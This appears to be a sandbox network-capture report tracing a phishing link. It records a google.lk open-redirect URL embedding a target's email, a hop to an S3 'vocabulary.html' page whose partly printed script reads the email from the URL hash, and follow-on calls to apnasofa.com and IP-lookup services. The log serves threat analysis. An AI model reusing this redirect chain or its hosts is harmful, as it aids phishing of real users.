                                                                        Dec 3, 2024 17:49:48.988084078 CET192.168.2.41.1.1.1c223(Port unreachable)Destination Unreachable
                                                                        Dec 3, 2024 17:49:52.194926977 CET192.168.2.41.1.1.1c223(Port unreachable)Destination Unreachable
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 3, 2024 17:49:27.660437107 CET192.168.2.41.1.1.10xa9dbStandard query (0)google.lkA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:27.661113977 CET192.168.2.41.1.1.10x7fa1Standard query (0)google.lk65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:31.377463102 CET192.168.2.41.1.1.10xfeb9Standard query (0)www.google.lkA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:31.377661943 CET192.168.2.41.1.1.10x24beStandard query (0)www.google.lk65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:31.633147001 CET192.168.2.41.1.1.10xcea5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:31.633330107 CET192.168.2.41.1.1.10x87c4Standard query (0)www.google.com65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:32.820708036 CET192.168.2.41.1.1.10xb9beStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.161744118 CET192.168.2.41.1.1.10xc8b6Standard query (0)i--iy.s3.us-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.161961079 CET192.168.2.41.1.1.10x483aStandard query (0)i--iy.s3.us-east-1.amazonaws.com65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:39.437181950 CET192.168.2.41.1.1.10x3b2cStandard query (0)apnasofa.comA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:39.437350035 CET192.168.2.41.1.1.10xa200Standard query (0)apnasofa.com65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:40.508248091 CET192.168.2.41.1.1.10xfeeeStandard query (0)apnasofa.comA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:40.508399963 CET192.168.2.41.1.1.10x398bStandard query (0)apnasofa.com65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:46.305804968 CET192.168.2.41.1.1.10xccb7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:46.305939913 CET192.168.2.41.1.1.10x3ff9Standard query (0)api.ipify.org65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:46.317207098 CET192.168.2.41.1.1.10x4f26Standard query (0)apnasofa.comA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:46.317354918 CET192.168.2.41.1.1.10x924cStandard query (0)apnasofa.com65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:48.581543922 CET192.168.2.41.1.1.10x3385Standard query (0)ipwhois.appA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:48.581543922 CET192.168.2.41.1.1.10x8c84Standard query (0)ipwhois.app65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:48.582461119 CET192.168.2.41.1.1.10xe02Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:48.582461119 CET192.168.2.41.1.1.10xfa62Standard query (0)api.ipify.org65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:51.970135927 CET192.168.2.41.1.1.10xea78Standard query (0)ipwhois.appA (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:51.970494986 CET192.168.2.41.1.1.10x8e55Standard query (0)ipwhois.app65IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 3, 2024 17:49:27.898919106 CET1.1.1.1192.168.2.40xa9dbNo error (0)google.lk142.250.181.67A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:31.517822981 CET1.1.1.1192.168.2.40xfeb9No error (0)www.google.lk172.217.17.35A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:31.770998001 CET1.1.1.1192.168.2.40xcea5No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:31.771024942 CET1.1.1.1192.168.2.40x87c4No error (0)www.google.com65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:33.151195049 CET1.1.1.1192.168.2.40xb9beNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:35.002927065 CET1.1.1.1192.168.2.40x1137No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:35.002927065 CET1.1.1.1192.168.2.40x1137No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469763994 CET1.1.1.1192.168.2.40x483aNo error (0)i--iy.s3.us-east-1.amazonaws.coms3-r-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469789028 CET1.1.1.1192.168.2.40xc8b6No error (0)i--iy.s3.us-east-1.amazonaws.coms3-r-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469789028 CET1.1.1.1192.168.2.40xc8b6No error (0)s3-r-w.us-east-1.amazonaws.com16.182.106.106A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469789028 CET1.1.1.1192.168.2.40xc8b6No error (0)s3-r-w.us-east-1.amazonaws.com54.231.160.10A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469789028 CET1.1.1.1192.168.2.40xc8b6No error (0)s3-r-w.us-east-1.amazonaws.com16.182.72.50A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469789028 CET1.1.1.1192.168.2.40xc8b6No error (0)s3-r-w.us-east-1.amazonaws.com3.5.12.61A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469789028 CET1.1.1.1192.168.2.40xc8b6No error (0)s3-r-w.us-east-1.amazonaws.com52.216.42.194A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469789028 CET1.1.1.1192.168.2.40xc8b6No error (0)s3-r-w.us-east-1.amazonaws.com16.15.184.190A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469789028 CET1.1.1.1192.168.2.40xc8b6No error (0)s3-r-w.us-east-1.amazonaws.com52.217.93.216A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:37.469789028 CET1.1.1.1192.168.2.40xc8b6No error (0)s3-r-w.us-east-1.amazonaws.com54.231.233.50A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:40.601001024 CET1.1.1.1192.168.2.40x3b2cNo error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:40.648082972 CET1.1.1.1192.168.2.40xfeeeNo error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:46.530491114 CET1.1.1.1192.168.2.40xccb7No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:46.530491114 CET1.1.1.1192.168.2.40xccb7No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:46.530491114 CET1.1.1.1192.168.2.40xccb7No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:46.633208990 CET1.1.1.1192.168.2.40x3ff9No error (0)api.ipify.org65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:46.633235931 CET1.1.1.1192.168.2.40x4f26No error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:48.719578981 CET1.1.1.1192.168.2.40xe02No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:48.719578981 CET1.1.1.1192.168.2.40xe02No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:48.719578981 CET1.1.1.1192.168.2.40xe02No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:48.720115900 CET1.1.1.1192.168.2.40xfa62No error (0)api.ipify.org65IN (0x0001)false
                                                                        Dec 3, 2024 17:49:48.925434113 CET1.1.1.1192.168.2.40x3385No error (0)ipwhois.app103.126.138.87A (IP address)IN (0x0001)false
                                                                        Dec 3, 2024 17:49:52.108850956 CET1.1.1.1192.168.2.40xea78No error (0)ipwhois.app103.126.138.87A (IP address)IN (0x0001)false
                                                                        • google.lk
                                                                        • www.google.lk
                                                                        • fs.microsoft.com
                                                                        • i--iy.s3.us-east-1.amazonaws.com
                                                                        • slscr.update.microsoft.com
                                                                        • https:
                                                                          • apnasofa.com
                                                                          • api.ipify.org
                                                                          • ipwhois.app
                                                                        • otelrules.azureedge.net
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449739142.250.181.674438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:30 UTC900OUTGET /url?q=smurphy@american-usa.com&american-usa.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                                                                        Host: google.lk
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-User: ?1
                                                                        Sec-Fetch-Dest: document
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:31 UTC758INHTTP/1.1 301 Moved Permanently
                                                                        Location: https://www.google.lk/url?q=smurphy@american-usa.com&american-usa.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Lw8x46-W4gaR5uLfEZC3fg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                        Permissions-Policy: unload=()
                                                                        Date: Tue, 03 Dec 2024 16:49:31 GMT
                                                                        Expires: Thu, 02 Jan 2025 16:49:31 GMT
                                                                        Cache-Control: public, max-age=2592000
                                                                        Server: gws
                                                                        Content-Length: 343
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close
                                                                        2024-12-03 16:49:31 UTC343INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 6c 6b 2f 75 72 6c 3f 71 3d 73 6d 75 72 70 68 79 40 61 6d 65 72 69 63 61 6e 2d 75 73 61 2e 63 6f 6d 26 61 6d 70 3b 61 6d 65 72 69 63 61 6e 2d 75 73 61 2e 63 6f 6d 3d 26 61 6d 70 3b 73 61 3d 74 26 61 6d 70
                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.lk/url?q=smurphy@american-usa.com&amp;american-usa.com=&amp;sa=t&amp


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.44974623.218.208.109443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:31 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        Accept-Encoding: identity
                                                                        User-Agent: Microsoft BITS/7.8
                                                                        Host: fs.microsoft.com
                                                                        2024-12-03 16:49:32 UTC479INHTTP/1.1 200 OK
                                                                        Content-Type: application/octet-stream
                                                                        Server: Kestrel
                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                        X-Ms-Region: prod-weu-z1
                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                        X-OSID: 2
                                                                        X-CID: 2
                                                                        X-CCC: GB
                                                                        Cache-Control: public, max-age=162476
                                                                        Date: Tue, 03 Dec 2024 16:49:32 GMT
                                                                        Connection: close
                                                                        X-CID: 2


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449747172.217.17.354438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:33 UTC905OUTGET /url?q=smurphy@american-usa.com&american-usa.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                                                                        Host: www.google.lk
                                                                        Connection: keep-alive
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-User: ?1
                                                                        Sec-Fetch-Dest: document
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:34 UTC1036INHTTP/1.1 302 Found
                                                                        Location: https://www.google.lk/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                                        Cache-Control: private
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-uvkyPeq_LKHkrX0bIUH-Uw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                        Permissions-Policy: unload=()
                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                        Date: Tue, 03 Dec 2024 16:49:33 GMT
                                                                        Server: gws
                                                                        Content-Length: 273
                                                                        X-XSS-Protection: 0
                                                                        Set-Cookie: NID=519=eWcWtT-Eo0l2hSn0eZjBbQfUACvxSEJXSFMWZySD3Hu3qK1rAD_jcuoN4m8X5FsCdJnMQtoonFfeBT7XgiS7xzUAvIWPh9xzftJfadE1-s7kUwr6D8ArZ8ADvY7nxCI6aRi_liRWEksWZGvA252OchYxeeaY0oKPZHI0zyFJPs0rfhsRWPNLm7IVlqAY1wpXgu7Rwg; expires=Wed, 04-Jun-2025 16:49:33 GMT; path=/; domain=.google.lk; Secure; HttpOnly; SameSite=none
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close
                                                                        2024-12-03 16:49:34 UTC273INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 6c 6b 2f 61 6d 70 2f 73 2f 69 2d 2d 69 79 2e 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 76 6f 63 61 62 75 6c 61 72 79 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e
                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.lk/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html">here</A>.


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.44975023.218.208.109443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:33 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        Accept-Encoding: identity
                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                        Range: bytes=0-2147483646
                                                                        User-Agent: Microsoft BITS/7.8
                                                                        Host: fs.microsoft.com
                                                                        2024-12-03 16:49:34 UTC534INHTTP/1.1 200 OK
                                                                        Content-Type: application/octet-stream
                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                        ApiVersion: Distribute 1.1
                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                        X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                        Cache-Control: public, max-age=69350
                                                                        Date: Tue, 03 Dec 2024 16:49:34 GMT
                                                                        Content-Length: 55
                                                                        Connection: close
                                                                        X-CID: 2
                                                                        2024-12-03 16:49:34 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.449752172.217.17.354438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:36 UTC1063OUTGET /amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                                                                        Host: www.google.lk
                                                                        Connection: keep-alive
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-User: ?1
                                                                        Sec-Fetch-Dest: document
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Cookie: NID=519=eWcWtT-Eo0l2hSn0eZjBbQfUACvxSEJXSFMWZySD3Hu3qK1rAD_jcuoN4m8X5FsCdJnMQtoonFfeBT7XgiS7xzUAvIWPh9xzftJfadE1-s7kUwr6D8ArZ8ADvY7nxCI6aRi_liRWEksWZGvA252OchYxeeaY0oKPZHI0zyFJPs0rfhsRWPNLm7IVlqAY1wpXgu7Rwg
                                                                        2024-12-03 16:49:37 UTC825INHTTP/1.1 302 Found
                                                                        Location: https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                                        Cache-Control: private
                                                                        X-Robots-Tag: noindex
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-q8WvEYXKk4UQCVLNwbparQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                        Permissions-Policy: unload=()
                                                                        Date: Tue, 03 Dec 2024 16:49:36 GMT
                                                                        Server: gws
                                                                        Content-Length: 253
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close
                                                                        2024-12-03 16:49:37 UTC253INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 69 2d 2d 69 79 2e 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 76 6f 63 61 62 75 6c 61 72 79 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html">here</A>.</BODY></HTML>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.44975516.182.106.1064438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:38 UTC690OUTGET /vocabulary.html HTTP/1.1
                                                                        Host: i--iy.s3.us-east-1.amazonaws.com
                                                                        Connection: keep-alive
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-User: ?1
                                                                        Sec-Fetch-Dest: document
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:39 UTC413INHTTP/1.1 200 OK
                                                                        x-amz-id-2: DibwHr0PaWe340u6V1GWMgIPNptjyaVMQKlB+Goml1IqNEy46CPcYBKG7lSEfsrsSXeOwWaXbDM=
                                                                        x-amz-request-id: ADWVE2JXZC5V81B8
                                                                        Date: Tue, 03 Dec 2024 16:49:40 GMT
                                                                        Last-Modified: Thu, 28 Nov 2024 20:19:57 GMT
                                                                        ETag: "495735a2f76daba1413c4e6e2f30911b"
                                                                        x-amz-server-side-encryption: AES256
                                                                        Accept-Ranges: bytes
                                                                        Content-Type: text/html
                                                                        Content-Length: 442
                                                                        Server: AmazonS3
                                                                        Connection: close
                                                                        2024-12-03 16:49:39 UTC442INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 2f 2f 20 47 65 74 20 74 68 65 20 65 6e 63 6f 64 65 64 20 65 6d 61 69 6c 20 70 61 72 61 6d 65 74 65 72 20 66 72 6f 6d 20 74 68 65 20 55 52 4c 20 68 61 73 68 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6d 61 69 6c 45 6e 63 6f 64 65 64 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 20 2f 2f 20 52 65 6d 6f 76 65 20 74 68 65 20 66 69 72 73 74 20 63 68 61 72 61 63 74 65 72 20 27 23 27 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 64 69 72 65
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <script> // Get the encoded email parameter from the URL hash var emailEncoded = window.location.hash.substring(1); // Remove the first character '#' // Redire


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.44975620.109.210.534438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:41 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7Ykm4fASykGa2oz&MD=Wv9kBFLN HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                        Host: slscr.update.microsoft.com
                                                                        2024-12-03 16:49:41 UTC560INHTTP/1.1 200 OK
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        Content-Type: application/octet-stream
                                                                        Expires: -1
                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                        MS-CorrelationId: 46cb8930-ca7f-46b2-916a-0ab27c915b53
                                                                        MS-RequestId: fbe8d340-0101-4f43-a5a8-fb5a7ec80cf8
